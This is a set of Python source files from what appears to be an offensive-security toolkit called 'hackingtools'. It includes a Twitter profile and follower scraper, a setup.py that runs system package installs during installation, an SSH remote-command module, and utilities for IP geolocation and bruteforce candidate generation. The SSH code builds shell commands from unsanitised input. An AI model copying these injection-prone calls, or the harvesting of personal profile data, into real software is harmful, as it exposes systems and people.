				res = req.get(url)
				first_request = False
			else:
				url = MOBILE_URL + f"/{username}/{type_}/?lang=en&cursor={cursor}"
				res = req.get(url)
			if res:
				# extract cursor
				cursor = self.__extract_cursor__(res)
				if cursor:
					has_more = True
				else:
					has_more = False

				# parse followers/followings
				extracted_ff = self.__extract_ff__(res)
				result.extend(extracted_ff)
				# if there was limit
				if int(limit) > 0:
					if len(result) > int(limit):
						return result[:int(limit)]
				else:
					sleep(interval)
					continue

			else:
				return result
			# interval
			sleep(interval)

		return result

	def __timeline__(self, username, limit=1000, proxy=None, interval=0):
		"""
		timeline scraper
		:param username:
		:param limit:
		:param proxy:
		:param interval:
		:return:
		"""
		result: list = []
		cursor = "-1"
		has_more = True
		req = RequestHandler(user_agent="TIMELINE", ret="json")
		if proxy:
			req.proxy = proxy

		while has_more:

			url = BASE_URL+TIMELINE_WITH_TOKEN_QUERY+f"+from:{username}"
			url = url.replace("%TOKEN%", cursor)
			res = req.get(url)
			if res:
				cursor, has_more = self.__extract_timeline_cursor__(response=res)
				extracted_tweets = self.__extract_timeline__(res['items_html'])
				result.extend(extracted_tweets)
				# check limitation
				if int(limit) > 0:
					if len(result) > int(limit):
						return result[:int(limit)]
				else:
					sleep(interval)
					continue
			else:
				return result

			sleep(interval)

		return result

	def __profile__(self, username, proxy):
		"""
		get user profile
		"""
		
		req = RequestHandler(user_agent="TIMELINE")
		if proxy:
			req.proxy = proxy
		url = BASE_URL+username+"/?lang=en"
		res = req.get(url=url)
		if res:
			return self.__extract_profile__(res)
		else:
			return None

	def __extract_cursor__(self, html):
		"""
		extract token for next page
		:param html:
		:return:
		"""
		cursor = re.findall('cursor=(\d+)', html)
		if len(cursor) > 0:
			return cursor[0]
		else:
			return ""

	def __extract_timeline_cursor__(self, response):
		"""
		Extract cursor from json
		:param response:
		:return:
		"""
		return response['min_position'], response['has_more_items']

	def __extract_ff__(self, html):
		"""
		Extract followers/followings data from html
		:param html:
		:return:
		"""
		result = []
		soup = BeautifulSoup(html, 'html.parser')
		user_tables = soup.find_all('table', attrs={"class": "user-item"})
		if user_tables:
			for user in user_tables:
				avatar = user.find("img", attrs={"class": "profile-image"})['src'].replace('_normal','')
				if 'default_profile.png' in avatar:
					avatar = ''
				username = user.find("span", attrs={"class": "username"}).text.strip("@")
				fullname = user.find("strong", attrs={"class": "fullname"}).text
				# append to result list
				result.append(self.__FFClass__(username=username, avatar=avatar, fullname=fullname).__str__())
		return result

	def __extract_timeline__(self, html):
		"""
		Extract tweets from timeline data
		:param html:
		:return:
		"""
		result: list = []
		soup = BeautifulSoup(html, 'html.parser')

		for li in soup.find_all('li', attrs={'class': 'js-stream-item stream-item stream-item'}):
			# find first div
			first_div = li.find('div')
			# user and tweet info
			tweet_id = first_div['data-tweet-id']
			tweet_link = first_div['data-permalink-path']
			conversation_id = first_div['data-conversation-id']
			is_reply = first_div.get('data-is-reply-to', "false")
			has_parent = first_div.get('data-has-parent-tweet', "false")
			screen_name = first_div['data-screen-name']
			name = first_div['data-name']
			user_id = first_div['data-user-id']
			user_mentions = first_div.get('data-mentions', 'false')
			if ' ' in user_mentions:
				user_mentions = [user for user in user_mentions.split(" ")]
			# get content info
			content = li.find('div', attrs={'class': 'js-tweet-text-container'}).text
			# tweet statistics
			reply_count = li.find('span', attrs={'class': 'ProfileTweet-action--reply u-hiddenVisually'}).text
			reply_count = reply_count.split(" ")[0].strip()
			retweet_count = li.find('span', attrs={'class': 'ProfileTweet-action--retweet u-hiddenVisually'}).text
			retweet_count = retweet_count.split(" ")[0].strip()
			likes_count = li.find('span', attrs={'class': 'ProfileTweet-action--favorite u-hiddenVisually'}).text
			likes_count = likes_count.split(" ")[0].strip()
			# time
			created_at = li.find('a', attrs={'class': 'tweet-timestamp js-permalink js-nav js-tooltip'})['title']
			#
			# add data to result
			result.append(self.__TimelineClass__(
				tweet_id=tweet_id,
				tweet_link=tweet_link,
				conversation_id=conversation_id,
				is_reply=is_reply,
				has_parent=has_parent,
				screen_name=screen_name,
				name=name,
				user_id=user_id,
				user_mentions=user_mentions,
				content=content,
				reply_count=reply_count,
				retweet_count=retweet_count,
				likes_count=likes_count,
				created_at=created_at
			).__str__())
		return result

	def __extract_profile__(self, html):
		"""
		extract profile data
		:param html:
		:return:
		"""
		result = []

		soup = BeautifulSoup(html, 'html.parser')
		left_side = soup.find('div', attrs={'class': 'ProfileHeaderCard'})
		# get name
		name = left_side.find('a', attrs={'class': 'ProfileHeaderCard-nameLink u-textInheritColor js-nav'}).text
		# verified account
		verified = left_side.find('span', attrs={'class': 'Icon Icon--verified'})
		if verified:
			verified = "true"
		else:
			verified = "false"
		# protected account
		protected = left_side.find('span', attrs={'class': 'Icon Icon--protected'})
		if protected:
			protected = "true"
		else:
			protected = "false"
		# screen name
		username = left_side.find('b', attrs={'class': 'u-linkComplex-target'}).text
		# bio
		bio = left_side.find('p', attrs={'class': 'ProfileHeaderCard-bio u-dir'}).text
		# location
		location = left_side.find('div', attrs={'class': 'ProfileHeaderCard-location'}).text.strip()
		# url
		url = left_side.find('span', attrs={'class': 'ProfileHeaderCard-urlText u-dir'}).text.strip()
		# joined date
		joined_date = left_side.find('span', attrs={'class': 'ProfileHeaderCard-joinDateText js-tooltip u-dir'})['title']
		# birthday
		birthday = left_side.find('span', attrs={'class': 'ProfileHeaderCard-birthdateText u-dir'}).text.strip()

		# navbar
		navbar = soup.find('div', attrs={'class': 'ProfileCanopy-nav'})
		# get user id
		user_id = navbar.find('div', attrs={'class': 'ProfileNav'})["data-user-id"]
		# find tweets count
		try:
			li_ = navbar.find('li', attrs={'class': 'ProfileNav-item ProfileNav-item--tweets is-active'})
			tweet_count = li_.find('span', attrs={'class': 'ProfileNav-value'}).text.strip()
		except AttributeError:
			tweet_count = 0

		# find followings
		try:
			li_ = navbar.find('li', attrs={'class': 'ProfileNav-item ProfileNav-item--following'})
			following_count = li_.find('span', attrs={'class': 'ProfileNav-value'}).text.strip()
		except AttributeError:
			following_count = 0

		# find followers
		try:
			li_ = navbar.find('li', attrs={'class': 'ProfileNav-item ProfileNav-item--followers'})
			follower_count = li_.find('span', attrs={'class': 'ProfileNav-value'}).text.strip()
		except AttributeError:
			follower_count = 0

		# find likes
		try:
			li_ = navbar.find('li', attrs={'class': 'ProfileNav-item ProfileNav-item--favorites'})
			like_count = li_.find('span', attrs={'class': 'ProfileNav-value'}).text.strip()
		except AttributeError:
			like_count = 0
		#
		result.append(self.__ProfileClass__(
			name=name,
			verified=verified,
			protected=protected,
			username=username,
			bio=bio,
			location=location,
			url=url,
			joined_date=joined_date,
			birthday=birthday,
			user_id=user_id,
			tweet_count=tweet_count,
			following_count=following_count,
			follower_count=follower_count,
			like_count=like_count
		).__str__())
		return result

	def __to_json__(self, objects_list):
		"""
		Get objects and convert it to json
		:param objects_list:
		:return:
		"""
		try:
			if objects_list[0].__class__.__name__ == "FF":
				return [obj.__dict__ for obj in objects_list]

			elif objects_list[0].__class__.__name__ == "Timeline":
				return [obj.__dict__ for obj in objects_list]
			elif objects_list[0].__class__.__name__ == "Profile":
				return [obj.__dict__ for obj in objects_list]
		except IndexError:
			return []

	def __to_list__(self, objects_list):
		"""
		Get objects and convert it to list
		:param objects_list:
		:return:
		"""
		try:
			if objects_list[0].__class__.__name__ == "FF":
				return [[obj.username, obj.avatar, obj.fullname] for obj in objects_list]

			elif objects_list[0].__class__.__name__ == "Timeline":
				return [[
					obj.tweet_id,
					obj.tweet_link,
					obj.conversation_id,
					obj.is_reply,
					obj.has_parent,
					obj.screen_name,
					obj.user_id,
					obj.user_mentions,
					obj.content,
					obj.reply_count,
					obj.retweet_count,
					obj.likes_count,
					obj.created_at] for obj in objects_list]
			elif objects_list[0].__class__.__name__ == "Profile":
				return [[
					obj.name,
					obj.verified,
					obj.protected,
					obj.username,
					obj.bio,
					obj.location,
					obj.url,
					obj.joined_date,
					obj.birthday,
					obj.user_id,
					obj.tweet_count,
					obj.following_count,
					obj.follower_count,
					obj.likes_count
				] for obj in objects_list]
		except IndexError:
			return []

	def __to_pandas__(self, objects_list):
		"""
		Get objects and convert it pandas DataFrame
		:param objects_list:
		:return:
		"""
		try:
			if objects_list[0].__class__.__name__ == "FF":
				return pd.DataFrame(self.__to_json__(objects_list))
			elif objects_list[0].__class__.__name__ == "Timeline":
				return pd.DataFrame(self.__to_json__(objects_list))
			elif objects_list[0].__class__.__name__ == "Profile":
				return pd.DataFrame(self.__to_json__(objects_list))
		except IndexError:
			return pd.DataFrame()

	


from setuptools import setup, find_packages
import os, sys, subprocess
try:
    from pip import main as pipmain
except ImportError:
    from pip._internal import main as pipmain

requirements = ''
try:
    with open('requirements.txt') as f:
        requirements = f.read().splitlines()
except:
    print('You should install on Python 3.7+')

def checkPackages():
    # If Linux
    extra_packages = {
        "linux-apt" : ['build-essential', 'cmake', 'libopenblas-dev', 'liblapack-dev', 'libx11-dev', 'libgtk-3-dev'],
        "linux" : ['dlib'],
    }
    for system in extra_packages:
        if os.name in system:
            if '-apt' in system:
                for package in extra_packages[system]:
                    if not package in sys.modules:
                        subprocess.run('apt install {p}'.format(p=package))
            else:
                for package in extra_packages[system]:
                    if not package in sys.modules:
                        pipmain(['install', package])

checkPackages()

setup(name='hackingtools',
        version='3.0.0.947',
        description='All Hacking Tools in this Python with Manually Created Modules',
        url='http://github.com/ConnorXploit/hackingtools-py',
        author='Connor',
        author_email='cgehminecraft@gmail.com',
        license='MIT',
        packages=find_packages(include=['hackingtools*']),
        include_package_data = True,
        package_data = {
            'hackingtools/core': ['config.json'],
            '': ['requirements.txt']
        },
        classifiers=[
            "Programming Language :: Python :: 3.7",
            "License :: OSI Approved :: MIT License"
        ],
        install_requires=requirements,
        zip_safe=False)


from hackingtools.core import Logger, Utils, Config
if Utils.amIdjango(__name__):
	from .library.core import hackingtools as ht
else:
	import hackingtools as ht
import os, sys
from paramiko import SSHClient as __SSHClient__
from paramiko import AutoAddPolicy as __AutoAddPolicy__
from paramiko import RSAKey as __RSAKey__
from paramiko.auth_handler import AuthenticationException as __AuthenticationException__
from paramiko.auth_handler import SSHException as __SSHException__
from scp import SCPClient as __SCPClient__
from scp import SCPException as __SCPException__

config = Config.getConfig(parentKey='modules', key='ht_ssh')
output_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'output'))

class StartModule():

	def __init__(self):
		self._main_gui_func_ = 'connect'

	def help(self):
		Logger.printMessage(message=ht.getFunctionsNamesFromModule('ht_ssh'), debug_module=True)

	 # Fetch and transfer SSH Keys.

	def connect(self, host, user, ssh_key_filepath, remote_upload_dir):
		self.host = host
		self.user = user
		self.ssh_key_filepath = ssh_key_filepath
		self.remote_path = remote_upload_dir
		self.client = None
		self.scp = None
		self.conn = None
		self.__upload_ssh_key__()

	def upload_files(self, files):
		"""Upload multiple files to a remote directory."""
		if self.client is None:
			self.client = self.__connect__()
		uploads = [self.__upload_single_file__(file) for file in files]
		Logger.printMessage(f'Finished uploading {len(uploads)} files to {self.remote_path} on {self.host}', debug_module=True)

	def download_file(self, file):
		"""Download file from remote host."""
		if self.conn is None:
			self.conn = self.__connect__()
		self.scp.get(file)

	def execute_commands(self, commands):
		"""Execute multiple commands in succession."""
		if self.client is None:
			self.client = self.__connect__()
		for cmd in commands:
			stdin, stdout, stderr = self.client.exec_command(cmd)
			stdout.channel.recv_exit_status()
			response = stdout.readlines()
			for line in response:
				Logger.printMessage(f'INPUT: {cmd} | OUTPUT: {line}')

	def disconnect(self):
		"""Close ssh connection."""
		self.client.close()
		self.scp.close()

	def __get_ssh_key__(self):
		"""Fetch locally stored SSH key."""
		try:
			self.ssh_key = __RSAKey__.from_private_key_file(self.ssh_key_filepath)
		except __SSHException__:
			self.ssh_key = None
		return self.ssh_key

	def __upload_ssh_key__(self):
		try:
			os.system(f'scp -i {self.ssh_key_filepath} {self.user}@{self.host}')
			os.system(f'scp -i {self.ssh_key_filepath}.pub {self.user}@{self.host}')
		except FileNotFoundError as e:
			Logger.printMessage(e, is_error=True)
		except Exception as e:
			Logger.printMessage(e, is_error=True)

	def __connect__(self):
		"""Open connection to remote host."""
		try:
			self.client = __SSHClient__()
			self.client.load_system_host_keys()
			self.client.set_missing_host_key_policy(__AutoAddPolicy__())
			self.client.connect(self.host, username=self.user, key_filename=self.ssh_key_filepath, look_for_keys=True, timeout=5000)
			self.scp = __SCPClient__(self.client.get_transport())
		except __AuthenticationException__ as e:
			Logger.printMessage('Authentication failed: did you remember to create an SSH key?', is_error=True)
			Logger.printMessage(e, is_error=True)
		except Exception as e:
			Logger.printMessage(e, is_error=True)
		finally:
			return self.client

	def __upload_single_file__(self, file):
		"""Upload a single file to a remote directory."""
		try:
			self.scp.put(file, recursive=True, remote_path=self.remote_path)
		except __SCPException__ as e:
			Logger.printMessage(e, is_error=True)
		except Exception as e:
			Logger.printMessage(e, is_error=True)
		finally:
			Logger.printMessage(f'Uploaded {file} to {self.remote_path}', debug_module=True)




from . import Config, Logger

def amIdjango(fileCall):
    # Used by core on init for initialaizing Django Functions if needed
    return True if 'core.library.hackingtools' == fileCall else False

if amIdjango(__name__):
    from core.library import hackingtools as ht
    from core.library.hackingtools.core.Objects import Worker as __Worker
else:
    import hackingtools as ht
    from hackingtools.core.Objects import Worker as __Worker
__config__ = Config.getConfig(parentKey='core', key='Utils')
__config_logger__ = Config.getConfig(parentKey='core', key='Logger')
__config_utils__ = Config.getConfig(parentKey='core', key='Utils', subkey='dictionaries')

__function_param_exclude__ = Config.getConfig(parentKey='core', key='import_modules', subkey='__function_param_exclude__')
__default_class_name_for_all__ = Config.getConfig(parentKey='core', key='import_modules', subkey='__default_class_name_for_all__')  

import random as __random
import requests as __requests
import base64 as __base64
import os as __os
import ast
import inspect
import json as __json
import shutil
from threading import Thread
from threading import Lock
from itertools import product
from functools import reduce
from datetime import datetime
import platform as __platform
try:
    import git
except:
    pass
import re
from pathlib import Path

global threads
threads = {}

__path = __os.path.abspath(__os.path.split(__os.path.dirname(__file__))[0])

def getWorkers():
    global threads
    return threads

def startWorker(workerName, functionCall, args=(), timesleep=1, loop=True, run_until_ht_stops=False, log=False, timeout=None):
    t = None
    try:
        w = __Worker()
        if log:
            Logger.printMessage('Starting Worker: {w}'.format(w=workerName))
        t = Thread(target=w.run, args=(functionCall, args, int(timesleep), loop, timeout ), daemon=run_until_ht_stops)
        if loop:
            threads[workerName] = [ w, t ]
        t.start()
    except Exception as e:
        Logger.printMessage(str(e), is_error=True)

def killAllWorkers():
    global threads
    for t in threads:
        threads[t][0].terminate()
        threads[t][1].join()

def stopWorker(workerName):
    global threads
    if workerName in threads:
        try:
            threads[workerName][0].terminate()
            threads[workerName][1].join()
        except Exception as e:
            Logger.printMessage(str(e), is_error=True)
        del threads[workerName]

# File Manipulation
def getFileContentInByteArray(filePath):
    """Function that returns a ByteArray with the data from a file
    
    Arguments:
        filePath {String} -- The Path of the file and the file name
    
    Returns:
        byteArray -- The content of the file / None
    """
    try:
        Logger.printMessage(message='{methodName}'.format(methodName='getFileInByteArray'), description='{filePath}'.format(filePath=filePath), debug_core=True)
        the_file = open(filePath, "rb")
        file_data = the_file.read()
        the_file.close()
        return file_data
    except:
        pass
    return None
        
def saveToFile(content, fileName):
    """Saves a new file with a Byte Array and a fileName
    
    Arguments:
        content {byteArray} -- The content we want to write into the file
        fileName {String} -- The file name
    
    Returns:
        boolean -- If saved True, else False
    """
    try:
        Logger.printMessage(message='{methodName}'.format(methodName='saveToFile'), description='{filename}'.format(filename=fileName), debug_core=True)
        the_file = open(fileName, "w")
        the_file.write(content)
        the_file.close()
        return True
    except:
        pass
    return False

def emptyDirectory(directory):
    """
    Cleans a directory given as param
    Be carefull with the 
    
    Arguments:
        dir : str
        
            output_dir variable in modules,
            for example, ht_crypter, it has a
            path automatically created
            for this function
    Returns:
        bool

            Returns if all was OK
    """
    try:
        #Logger.printMessage(message='emptyDirectory', description='Would empty: {path}'.format(path=directory), is_warn=True)
        #if __os.path.isdir(directory):
        #    shutil.rmtree(directory)
        #    return True
        # ! Temporary ommited
        return False
    except:
        return False

def readFileAsString(filepath):
    data = ''
    try:
        f = open(filepath, 'r', encoding='utf8')
        data = f.read()
    except Exception as e:
        pass
    return data

# Data Manipulation
def getValidDictNoEmptyKeys(data):
    final_data = {}
    if isinstance(data, str):
        return data
    for d in data:
        if data[d]:
            if isinstance(data[d], str):
                final_data[d] = data[d]
            else:
                final_data[d] = getValidDictNoEmptyKeys(data[d])
    return final_data

def getFunctionFullCall(moduleName, category, functionName):
    return 'ht.modules.{category}.{modDir}.{module}.{callClass}().{function}'.format(category=category, modDir=moduleName.replace('ht_', ''), module=moduleName, callClass=__default_class_name_for_all__, function=functionName)

def getAnyFunctionParams(functionObjectStr, i_want_list=False):
    try:
        params_func = inspect.getfullargspec(eval(functionObjectStr))[0]
        params_func = [param for param in params_func if not param in __function_param_exclude__] if params_func else []

        args, _, __, defaults = inspect.getargspec(eval(functionObjectStr))
        args = [param for param in args if not param in __function_param_exclude__] if args else []

        if defaults:
            new_params_func = params_func[:-len(defaults)]
            args_defaults = dict(zip(params_func[-len(defaults):], defaults))

        if i_want_list:
            if defaults:
                # urls.py
                return new_params_func + [i for i in args_defaults.keys()]

            return {"params":params_func}

        if defaults:
            return {"params":new_params_func,"defaults": args_defaults}

        return {"params":params_func}
    except:
        pass
        #Logger.printMessage('{functionObjectStr} is not a function'.format(functionObjectStr=functionObjectStr), 'Be sure you have all your module class variables outsite the class, in the file ({functionObjectStr}.py) before the \'class StartModule:\' statement'.format(functionObjectStr='.'.join(functionObjectStr.split('.')[0:5])), is_error=True)
    return []

def getFunctionsParams(category, moduleName, functionName, i_want_list=False):
    function = getFunctionFullCall(moduleName=moduleName, category=category, functionName=functionName)
    return getAnyFunctionParams(function, i_want_list)

def getValueType(value, getResponse=False, returnLiteralType=False):
    try:
        if isinstance(value, bool) or isinstance(eval(value), bool):
            if returnLiteralType:
                return bool
            return 'checkbox'
    except:
        pass
    try:
        if isinstance(value, int) or isinstance(eval(value), int):
            if returnLiteralType:
                return int
            return 'number'
    except:
        pass
    try:
        if isinstance(value, dict) or isinstance(eval(value), dict):
            if returnLiteralType:
                return dict
            return 'data'
    except:
        pass
    try:
        if isinstance(value, datetime) or isinstance(eval(value), datetime) or datetime.strptime(value, '%Y-%m-%d %H:%M:%S') or isinstance(value, datetime):
            if returnLiteralType:
                return datetime
            return 'time'
    except:
        pass
    try:
        if (isinstance(value, list) or isinstance(eval(value), list)) and (str(value)[0] == '[' and str(value)[-1] == ']'):
            if returnLiteralType:
                return list
            return 'select'
    except:
        pass
    if returnLiteralType:
        return str
    try:
        if isinstance(value, str) or isinstance(eval(value), str):
            if returnLiteralType:
                return str
    except:
        pass
    if not getResponse:
        try:
            if isinstance(value, str) or isinstance(eval(value), str):
                if '.' in value and len(value.split('.')[1] in range(1,4)):
                    return 'file'
        except:
            pass
        try:
            if isinstance(value, str) or isinstance(eval(value), str):
                if 'path' in value or 'file' in value:
                    return 'file'
        except:
            pass
        try:
            if isinstance(value, str) or isinstance(eval(value), str):
                if 'pass' in value or 'password' in value:
                    return 'password'
        except:
            pass
    try:
        if isinstance(value, str) or isinstance(eval(value), str):
            if 'http' in value and ('.jpg' in value or '.png' in value or '.ico' in value or '.gif' in value or ('image' in value and '.php' in value)):
                return 'image'
    except:
        pass
    try:
        if isinstance(value, str) or isinstance(eval(value), str):
            if value.startswith('http://') or value.startswith('https://'):
                return 'url'
    except:
        pass
    try:
        if isinstance(value, str) or isinstance(eval(value), str):
            if len(value) > 100:
                return 'textarea'
    except:
        pass
    return 'text'

def doesFunctionContainsExplicitReturn(functionCall):
    try:
        return True if 'return' in inspect.getsource(eval(functionCall)) else False
    except:
        return False

def downloadProjectAsModuleFromGithub(moduleName, category, githubURL):
    try:
        ht.__createModule__(moduleName, category)
        moduleDir = __os.path.join( __path, 'modules', category, moduleName.replace('ht_', '') )
        if __os.path.isdir( moduleDir ):
            # Name for the new module-git
            name_git_folder = githubURL.split('/')[-1].replace('.git', '')
            # Get the dir path
            actual_git_folder = __os.path.join( moduleDir, name_git_folder )
            # Remove if exists
            if __os.path.isdir( actual_git_folder ):
                __os.remove( actual_git_folder )
            # Git clone
            git.Git( moduleDir ).clone( githubURL )
            # Create new name
            new_git_folder = __os.path.join( moduleDir, '_'.join( [ moduleName, 'git' ] ) )
            # Rename the folder
            if __os.path.isdir( new_git_folder ):
                __os.remove( new_git_folder )
                
            __os.rename( actual_git_folder, new_git_folder )
            # Get all files in directory
            entries = __os.listdir(new_git_folder)
            for ent in entries:
                # Check files for remove not interesting ones
                if ent.endswith('.md') or ent.endswith('.jpg') or ent.endswith('.png') or ent.endswith('.txt'):
                    __os.remove( __os.path.join( new_git_folder, ent ) )

            # Search for setup.py if there is
            entries = __os.listdir(new_git_folder)
            for filen in entries:
                file_to_read = __os.path.join( new_git_folder, filen )
                setup_content = readFileAsString( file_to_read )
                commands = []
                find_for = [ '--' ]
                for finding in find_for:
                    if finding in setup_content:
                        for ind in findIndexAllOccurrencesSubstring(finding, str( setup_content )):
                            interesting_line = str(setup_content)[ind:].split('\n')[0]
                            for appearances in interesting_line.split( finding ):
                                comm = ''.join( [ finding, appearances.split('\'')[0] ] ).split(' ')[0]
                                if not comm in commands and not comm == finding:
                                    commands.append( comm )
                if commands:
                    print('Found commands:', commands)
                else:
                    print('Not commands')
        else:
            Logger.printMessage('Not exists', description=moduleDir, is_error=True)
            ht.__removeModule__(moduleName, category)
    except Exception as e:
        raise
        Logger.printMessage(str(e), is_error=True)
        ht.__removeModule__(moduleName, category)

# Others
def getTime():
    return datetime.utcnow().strftime(__config_logger__['log_print_date_format'])[:-3]

def getLocationGPS():
    ip_request = __requests.get('https://get.geojs.io/v1/ip.json')
    geo_request_url = 'https://get.geojs.io/v1/ip/geo/' + ip_request.json()['ip'] + '.json'
    geo_request = __requests.get(geo_request_url)
    geo_data = geo_request.json()
    return geo_data

def getIPLocationGPS(ip, api):
    url = 'http://api.ipinfodb.com/v3/ip-city/?key={api}&ip={ip}'.format(api=api, ip=ip)
    res = __requests.get(url).content.decode()
    if len(res.split(';')) > 8:
        return {'ip' : ip, 'location' : [ res.split(';')[9], res.split(';')[8] ] }
    else:
        return {'ip' : ip, 'location' : [0, 0] }

def getIPLocationGPS_v2(ip):
    try:
        url = 'https://api.ipgeolocationapi.com/geolocate/{ip}'.format(ip=ip)
        res = __json.loads(__requests.get(url).content.decode())
        if res['geo']:
            return {'ip' : ip, 'location' : [ res['geo']['longitude'], res['geo']['latitude'] ], 'country' : res['alpha2'].lower() }
        else:
            return {'ip' : ip, 'location' : [0, 0], 'country' : 'us' }
    except:
        return {'ip' : ip, 'location' : [0, 0], 'country' : 'us' }

# Maths
def euclides(a, b):
    """Euclid's algorithm for determining the greatest common divisor
    Use iteration to make it faster for larger integers
    
    Arguments:
        a {integer} -- Value 1 to use in euclides
        b {integer} -- Value 2 to use in euclides
    
    Returns:
        integer -- Euclides of a and b
    """
    Logger.printMessage(message='{methodName}'.format(methodName='euclides'), description='{a} - {b}'.format(a=a, b=b), debug_core=True)
    while b != 0:
        a, b = b, a % b
    return a

def multiplicativeInverse(e, phi):
    """Euclid's extended algorithm for finding the multiplicative inverse of two numbers
    
    Arguments:
        e {integer} -- Euclides value
        phi {integer} -- Phi value
    
    Returns:
        integer -- The inverse multiplicative of e and phi
    """
    Logger.printMessage(message='{methodName}'.format(methodName='multiplicativeInverse'), description='{e} - {phi}'.format(e=e, phi=phi), debug_core=True)
    # See: http://en.wikipedia.org/wiki/Extended_Euclidean_algorithm
    def eea(a,b):
        if b==0:return (1,0)
        (q,r) = (a//b,a%b)
        (s,t) = eea(b,r)
        return (t, s-(q*t) )

    inv = eea(e,phi)[0]
    if inv < 1: inv += phi #we only want positive values
    return inv

def isPrime(n):
    """Tests to see if a number is prime.
    
    Arguments:
        number {integer} -- The number to test if is a prime number
    
    Returns:
        boolean -- If is prime True, else False
    """
    Logger.printMessage(message='{methodName}'.format(methodName='isPrime'), description='{n}'.format(n=n), debug_core=True)
    excepted = (0, 2, 4, 5, 6, 8)
    if not int(str(n)[-1]) in excepted:
        if (n==1):
            return False
        elif (n==2):
            return True
        else:
            for x in range(2,n):
                if(n % x==0):
                    return False
            return True
    return False

def getRandomPrimeByLength(length = 8):
    """Returns a random prime number with the length you choose
    
    Keyword Arguments:
        length {integer} -- The length of the number we want (default: {8})
    
    Returns:
        integer -- A random prime number with the length you specified / -1
    """
    try:
        length = int(length)
    except:
        length = 8
    try:
        while True:
            n = int(randomText(length=length, alphabet='numeric'))
            if len(str(n)) == length and isPrime(n):
                return n
    except:
        return -1

# Text Treatment
def findIndexAllOccurrencesSubstring(substring, content):
    return [m.start() for m in re.finditer( substring, str(content) )]

def decimalToBinary(n):
    return bin(n).replace("0b","")

def textToAscii(content):
    """Transform text in String to ASCII Array
    
    Arguments:
        content {String} -- The String content we want to transform into ASCII Array
    
    Returns:
        Array -- The content String transformed into an Array in ASCII
    """
    Logger.printMessage(message='{methodName}'.format(methodName='textToAscii'), description='Length: {length} - {content} ...'.format(length=len(content), content=content[0:10]), debug_core=True)
    return [ord(pal) for pal in content]

def asciiToHex(content):
    """Transform ASCII Array to Hex Array
    
    Arguments:
        content {Array} -- An Array with some content in ASCII for transforming into Hex Array
    
    Returns:
        Array -- The content ASCII Array transformed into an Hex Array
    """
    Logger.printMessage(message='{methodName}'.format(methodName='AsciiToHex'), description='Length: {length} - {content} ...'.format(length=len(content), content=content[0:10]), debug_core=True)
    return [hex(n)[2:] for n in content]

def hexToBase64(content):
    """Transform Hex Array to Base64 Array
    
    Arguments:
        content {Array} -- An Array with some content in Hex for transforming into Base64 Array
    
    Returns:
        Array -- The content transformed into an Base64 Array
    """
    Logger.printMessage(message='{methodName}'.format(methodName='HexToBase64'), description='Length: {length} - {content} ...'.format(length=len(content), content=content[0:10]), debug_core=True)
    return [__base64.b64encode(n.encode()) for n in content]

def joinBase64(content):
    """Transform Base64 Array to String
    
    Arguments:
        content {Array} -- An Array with some content in Base64 for transforming into a String
    
    Returns:
        String -- The content Base64 Array joined and transformed from Base64 decoded and encoded to String
    """
    Logger.printMessage(message='{methodName}'.format(methodName='joinBase64'), description='Length: {length} - {content} ...'.format(length=len(content), content=content[0:10]), debug_core=True)
    return (''.join([content[i].decode('utf-8') for i in range(0, len(content))])).encode()

def asciiToBase64(content):
    """Transform ASCII String to Base64 Array
    
    Arguments:
        content {String} -- A String with some content in ASCII for transforming into a Base64 Array
    
    Returns:
        Array -- The content in ASCII String transformed into a Base64 Array
    """
    Logger.printMessage(message='{methodName}'.format(methodName='asciiToBase64'), description='Length: {length} - {content} ...'.format(length=len(content), content=content[0:10]), debug_core=True)
    return [content[i:i+4] for i in range(0, len(content), 4)]

def base64ToHex(content):
    """Transform Base64 Array to Hex Array
    
    Arguments:
        content {Array} -- The content in a Base64 Array to transform into an Hex Array
    
    Returns:
        Array -- The content in Base64 Array transformed into an Hex Array
    """
    Logger.printMessage(message='{methodName}'.format(methodName='base64ToHex'), description='Length: {length} - {content} ...'.format(length=len(content), content=content[0:10]), debug_core=True)
    return [__base64.b64decode(b64) for b64 in content]

def hexToDecimal(content):
    """Transform Hex Array to Decimal Array
    
    Arguments:
        content {Array} -- The content in an Hex Array to transform to a Decimal Array
    
    Returns:
        Array -- The content in an Hex Array transformed into a Decimal Array
    """
    Logger.printMessage(message='{methodName}'.format(methodName='hexToDecimal'), description='Length: {length} - {content} ...'.format(length=len(content), content=content[0:10]), debug_core=True)
    return [int(hexa.decode("UTF-8"), 16) for hexa in content]

def decimalToAscii(content):
    """Transform Decimal Array to ASCII String
    
    Arguments:
        content {Array} -- The content in a Decimal Array to transform to an ASCII String
    
    Returns:
        String -- The content in a Decimal Array transformed to an ASCII String
    """
    Logger.printMessage(message='{methodName}'.format(methodName='decimalToAscii'), description='Length: {length} - {content} ...'.format(length=len(content), content=content[0:10]), debug_core=True)
    return ''.join([chr(dec) for dec in content])

def randomText(length=8, alphabet='lalpha', try_pattern=None, pattern_force_chars=None):
    try:
        if try_pattern:
            alphabets_patter = []
            for char in try_pattern:
                char_alphabet = fromWhatDictListIsChar(char=char)

                if char_alphabet and pattern_force_chars and not char in pattern_force_chars:
                    alphabets_patter.append(char_alphabet)
                else:
                    alphabets_patter.append(char)
                    
            return ''.join([ getRandomCharFromDict(alphabet=alp) if getRandomCharFromDict(alphabet=alp) else alp for alp in alphabets_patter ])

        return ''.join(__random.SystemRandom().choice(__config_utils__[alphabet]) for _ in range(int(length)))

    except Exception as e:
        Logger.printMessage(message=randomText, description=e, is_error=True)

def getRandomCharFromDict(alphabet='lalpha'):
    dictionaryOptions = Config.getConfig(parentKey='core', key='Utils', subkey='dictionaries')
    if alphabet in dictionaryOptions:
        return __random.choice(dictionaryOptions[alphabet])
    return None

def fromWhatDictListIsChar(char='a'):
    dictionaryOptions = Config.getConfig(parentKey='modules', key='ht_bruteforce', subkey='dictionaryOptions')
    for opt in dictionaryOptions:
        if char in __config_utils__[opt]:
            return opt
    return None

def getCombinationPosibilitiesLength(alphabet, length, generator=False):
    if generator:
        for x in product(__config_utils__[alphabet], repeat=int(length)):
            yield ''.join(x)
    else:
        return [ ''.join(x) for x in product(__config_utils__[alphabet], repeat=int(length)) ]

def getCombinationPosibilitiesByPattern(try_pattern=None, generator=False):
    try:
        alphabets_patter = []
        create_pattern = []
        for char in try_pattern:
            char_alphabet = fromWhatDictListIsChar(char=char)
            if char_alphabet:
                if len(alphabets_patter) == 0 or not char_alphabet in alphabets_patter or not alphabets_patter[-1] == char_alphabet:
                    alphabets_patter.append(char_alphabet)
                    create_pattern.append(1)
                else:
                    create_pattern[-1] += 1
            else:
